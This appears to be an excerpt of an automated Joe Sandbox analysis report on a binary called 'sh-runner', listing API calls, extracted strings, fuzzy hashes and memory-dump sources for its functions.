                                                                      • String ID: HTPIDPRSPLRPCACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPIDRRO_EL0TPIDR_EL0TPIDR$R10_$R10_$R11_$R11_$R12_$R12_$R13_$R13_$R13_$R13_$R13_$R13_$R14_$R14_$R14_$R14_$R14_$R14_$_ABT$_FIQ$_FIQ$_FIQ$_IRQ$_SVC$_UND$_USR$_USR$_USR
                                                                      • API String ID: 1475443563-995318
                                                                      • Opcode ID: f4a0205e7acadd5b3b877972655acb1242bb2a7e1140da83af69dff744d315df
                                                                      • Instruction ID: 9dd4e7e3f49ea9d54a58f9fa39a80d67f722a305d37d56e90bda5acb524a7bc7
                                                                      • Opcode Fuzzy Hash: f4a0205e7acadd5b3b877972655acb1242bb2a7e1140da83af69dff744d315df
                                                                      • Instruction Fuzzy Hash: 48515436B490438BF2BCFA6C98504BAA293DF58304B548439969F877D7CD39F8099F60
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$ErrorLast
                                                                      • String ID: \??\$\??\:\\\.\\\path is not valid$\??\UNC\`original` path is too long$\\.\$\\?\
                                                                      • API String ID: 1798101686-1231689588
                                                                      • Opcode ID: e961e7a58aaf3d90792703a109b22cecd2206073e839d8f5746194df9f725678
                                                                      • Instruction ID: 363d9b45ff56163e3f3cced6367b44f52b56204c0fcdef123c7dbf502249981e
                                                                      • Opcode Fuzzy Hash: e961e7a58aaf3d90792703a109b22cecd2206073e839d8f5746194df9f725678
                                                                      • Instruction Fuzzy Hash: 6D919662A18B8295EF68EF29DC403E9A361FF44798F84D035D94C4B7A8DF3D9189CB10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy$Find$CloseErrorFileFirstLastmemset
                                                                      • String ID: *\\?\\??\:\\\.\\\path is not valid
                                                                      • API String ID: 3412300865-1181881060
                                                                      • Opcode ID: cb9ac96185fd0c444c4f9cb3865ab23fab11a97b25199c48f37c8e6470b293e0
                                                                      • Instruction ID: b6b0e79fcb80b39d2d10e0358f4f405abd0d196d7c297f9bab357225fd701ff9
                                                                      • Opcode Fuzzy Hash: cb9ac96185fd0c444c4f9cb3865ab23fab11a97b25199c48f37c8e6470b293e0
                                                                      • Instruction Fuzzy Hash: 44C1E662B1469244FB28AB699C053FDA661FF84BD8F804135DD5C4BBEACF3DD5818720
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$FileModule32UnmapView$CreateFirstNextSnapshotToolhelp32memset
                                                                      • String ID:
                                                                      • API String ID: 2278125577-0
                                                                      • Opcode ID: 28d50c083199d7b79e8ccba0a691a97b968bba2aeb9e0effe2039b9cf07b3eca
                                                                      • Instruction ID: 416ed0648cf30c93d72d584c1edaceab4ecd9d16497667e64b2ed1ace2ced9c1
                                                                      • Opcode Fuzzy Hash: 28d50c083199d7b79e8ccba0a691a97b968bba2aeb9e0effe2039b9cf07b3eca
                                                                      • Instruction Fuzzy Hash: 7DE18662A08BC18AEB74AF29DC403F86360FB45798F848135CF5D1B7A6DF3896858724
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: memset$memcpy
                                                                      • String ID: .$0$FFFFFFFF
                                                                      • API String ID: 368790112-1041323599
                                                                      • Opcode ID: baf29033d4d66bb504d8d70b18f9e37c5236a394ab28e28df84039c56d65a7ed
                                                                      • Instruction ID: 55386173a11bf6415a40b6fe485fdfd67060d12ffe78e28ad46d2f2b0ec598e8
                                                                      • Opcode Fuzzy Hash: baf29033d4d66bb504d8d70b18f9e37c5236a394ab28e28df84039c56d65a7ed
                                                                      • Instruction Fuzzy Hash: DE913726F0868545FB6DEA3989103FCB7A2EF647A0FC44275CA5E066E4DE3C95458B20
                                                                      APIs
                                                                      Strings
                                                                      • NTDLL.DLL, xrefs: 00007FF72BD1542A
                                                                      • assertion failed: self.is_char_boundary(new_len)/rustc/6c6d210089e4589afee37271862b9f88ba1d7755\library\alloc\src\string.rs, xrefs: 00007FF72BD156FC
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFormatLastMessagememset
                                                                      • String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/6c6d210089e4589afee37271862b9f88ba1d7755\library\alloc\src\string.rs
                                                                      • API String ID: 3213201652-2508141481
                                                                      • Opcode ID: 15b56ef2df47a49a81f97455f74a7d1bccd05b7fa48a8e2239cd1947ab695685
                                                                      • Instruction ID: 861ac6d5f3ba63167b566fbbdf88eba29b4321ec4ab6ab2b68ca4a43c475747f
                                                                      • Opcode Fuzzy Hash: 15b56ef2df47a49a81f97455f74a7d1bccd05b7fa48a8e2239cd1947ab695685
                                                                      • Instruction Fuzzy Hash: 6DF1A622A19A9284FB29AF29DC007FCA761FB44788FC45035DE4D16BA6DF3CE645C760
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentPrng
                                                                      • String ID:
                                                                      • API String ID: 716580790-0
                                                                      • Opcode ID: 48505d29cadf61b442a691ef46f0850358945b65c0925643658045a632c3b598
                                                                      • Instruction ID: dbc602f558856f6b1f96d4c129ae14e0178af0166e852bda8e8131ee4d90a40f
                                                                      • Opcode Fuzzy Hash: 48505d29cadf61b442a691ef46f0850358945b65c0925643658045a632c3b598
                                                                      • Instruction Fuzzy Hash: 6202F276A18A928AE718AF39D8003F96BA0FB84798F845235EE5D477E9DF3CD041C710
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy
                                                                      • String ID: -pty$cygw$msys$win-
                                                                      • API String ID: 3510742995-1440016460
                                                                      • Opcode ID: 8d5a90feb98a6630309fbdfd4e35c81d7eac242735bce145a859c3383cf256e7
                                                                      • Instruction ID: 5c2f083e9e8575ce6e809f8ba1e4ca159411cd95f7af1f98fecf903272021eb9
                                                                      • Opcode Fuzzy Hash: 8d5a90feb98a6630309fbdfd4e35c81d7eac242735bce145a859c3383cf256e7
                                                                      • Instruction Fuzzy Hash: 47D13562A187C289F774AA78DC513F96790EB54388F889134DA494BBD9CF3CE181CF10
                                                                      Strings
                                                                      • Unknown pseudo relocation protocol version %d., xrefs: 00007FF72BD6B250
                                                                      • Unknown pseudo relocation bit size %d., xrefs: 00007FF72BD6B244
                                                                      • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF72BD6B08D
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                      • API String ID: 0-1286557213
                                                                      • Opcode ID: 79d3606074c03acd7ee10fa2614d67ca7db49e16cf856c305e6923568db78f53
                                                                      • Instruction ID: fac3ea5e36abb59e996ec84f03ad92f5ad1e40a49239ddbda4ce85ad4eb3278c
                                                                      • Opcode Fuzzy Hash: 79d3606074c03acd7ee10fa2614d67ca7db49e16cf856c305e6923568db78f53
                                                                      • Instruction Fuzzy Hash: C491B622E09D1741EB18AB28AC413F9A790FF5D764F948239DD6C177E4DE3CE8428E20
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 127d2e710b2fbb2dad025b4d010958ea53573c618a6973f67377dc73af12a754
                                                                      • Instruction ID: 90f097fd5e8aad4a0da4df4dbaaef056357ca2c0a38eec89f94e2153f5fdc526
                                                                      • Opcode Fuzzy Hash: 127d2e710b2fbb2dad025b4d010958ea53573c618a6973f67377dc73af12a754
                                                                      • Instruction Fuzzy Hash: 4AA1D362B2965581EB1CBA2A9C047F9A260FB89BD4F885531DD1D077E5DF3CE082DB20
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastbindclosesocketlisten
                                                                      • String ID:
                                                                      • API String ID: 2544828312-0
                                                                      • Opcode ID: 748ffb5efd0f39301a13475b86eb4fa1a00e22ed55c28eb2b7083ec44f07c07c
                                                                      • Instruction ID: 6c682cc32a6a0730e9a1ce1f9248378987bbb0ca122ed1a152042aa0d750f290
                                                                      • Opcode Fuzzy Hash: 748ffb5efd0f39301a13475b86eb4fa1a00e22ed55c28eb2b7083ec44f07c07c
                                                                      • Instruction Fuzzy Hash: 13313B61F0858146F71CBA6A9A413FDA260EF45BC0F848034EE5C57BE6EF2CF5918B20
                                                                      APIs
                                                                      • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF72BCFFABB
                                                                        • Part of subcall function 00007FF72BD6A710: RtlCaptureContext.KERNEL32 ref: 00007FF72BD6A78E
                                                                        • Part of subcall function 00007FF72BD6A710: RtlUnwindEx.KERNEL32 ref: 00007FF72BD6A7AC
                                                                        • Part of subcall function 00007FF72BD6A710: abort.MSVCRT ref: 00007FF72BD6A7B2
                                                                        • Part of subcall function 00007FF72BD6A710: abort.MSVCRT ref: 00007FF72BD6A7D0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: abort$AddressCaptureContextSingleUnwindWake
                                                                      • String ID: StderrLock$lock count overflow in reentrant mutexstd\src\sync\reentrant_lock.rs
                                                                      • API String ID: 3509065391-214416337
                                                                      • Opcode ID: c9917dc30047bce30c834a4958dfc760e7842858597a52e663ac847d41f4f166
                                                                      • Instruction ID: f6ef3815b5a5321a90996147bf93b78f52ad5e00536aebd14a1cebbcbf2a877b
                                                                      • Opcode Fuzzy Hash: c9917dc30047bce30c834a4958dfc760e7842858597a52e663ac847d41f4f166
                                                                      • Instruction Fuzzy Hash: 2BD1C622B0564186EB18EB2DDC503FDA360EB457A4F948636DE6E437E5DF3CE5828B10
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorStatus$FileOpen
                                                                      • String ID:
                                                                      • API String ID: 333864751-0
                                                                      • Opcode ID: 79e08d285390066f8c8e3106afc9c2b34007a1b195c426809136ab7f48f4070f
                                                                      • Instruction ID: 08571d1a5a9923f7d758a9b9b7a831982c97ba9863c920b88ec84e81a9fae4c8
                                                                      • Opcode Fuzzy Hash: 79e08d285390066f8c8e3106afc9c2b34007a1b195c426809136ab7f48f4070f
                                                                      • Instruction Fuzzy Hash: 76417231E14A8189F724AF78E8403ED77B0EB58358F945539DA8C97664DF3CA1C58B50
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastbindclosesocket
                                                                      • String ID:
                                                                      • API String ID: 698480664-0
                                                                      • Opcode ID: 4eb87b05c24c358b8626dbfb7c6a5281964d59a7c7398afb91b3523ab9e7afe7
                                                                      • Instruction ID: 62c7c376e936d09d6f672c251ff9fc5f0795dbc025ca95f41abe57ad53a84bda
                                                                      • Opcode Fuzzy Hash: 4eb87b05c24c358b8626dbfb7c6a5281964d59a7c7398afb91b3523ab9e7afe7
                                                                      • Instruction Fuzzy Hash: 7C21FC61B0459146F71CE76A9A403FDA261EF19BC0F848034EE4C57BA6EF2CF5D19B20
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Time$FilePreciseSystem
                                                                      • String ID:
                                                                      • API String ID: 1802150274-0
                                                                      • Opcode ID: daafc790f6fc2ab17385ebeccc3584105375b97aa96ea286096787869a2030ce
                                                                      • Instruction ID: 1c8dcb9110cb354ea5630e7354890f0947158d3df2784ecbf61cc5c52d10322a
                                                                      • Opcode Fuzzy Hash: daafc790f6fc2ab17385ebeccc3584105375b97aa96ea286096787869a2030ce
                                                                      • Instruction Fuzzy Hash: 57F02BB7B20A549AEF18EF79E9043A8A7659788BC4F00C0318F5D8BB68EF34C150C300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: DebuggerPresent
                                                                      • String ID:
                                                                      • API String ID: 1347740429-0
                                                                      • Opcode ID: cf75c0701d8c260c657b1e56a6b0707c8d967c953aea0b40d83ec687e36a79fd
                                                                      • Instruction ID: ab3185834b99118c2cebcb061e3a36ed1ece90cd03350f797b950bbdd8a54d47
                                                                      • Opcode Fuzzy Hash: cf75c0701d8c260c657b1e56a6b0707c8d967c953aea0b40d83ec687e36a79fd
                                                                      • Instruction Fuzzy Hash: F6C09B11F6484ADDF73D71755D461F58258EB9C304FDC1430D6AC445A69D0DE9EB8D30
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: HeapProcess
                                                                      • String ID:
                                                                      • API String ID: 54951025-0
                                                                      • Opcode ID: c20e518f1d37e1e12e5e670489950399516bf17debc5f331c8f703646b1520c4
                                                                      • Instruction ID: f272a2871f74fdbc5a836e12d867371eff3b9fe6d98c9c913b10c13864c0c434
                                                                      • Opcode Fuzzy Hash: c20e518f1d37e1e12e5e670489950399516bf17debc5f331c8f703646b1520c4
                                                                      • Instruction Fuzzy Hash: 66F0D613F1998189FB6D666A6C001F4A694EF88B90F5C4039CE5C433A1ED2CE4C18F20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
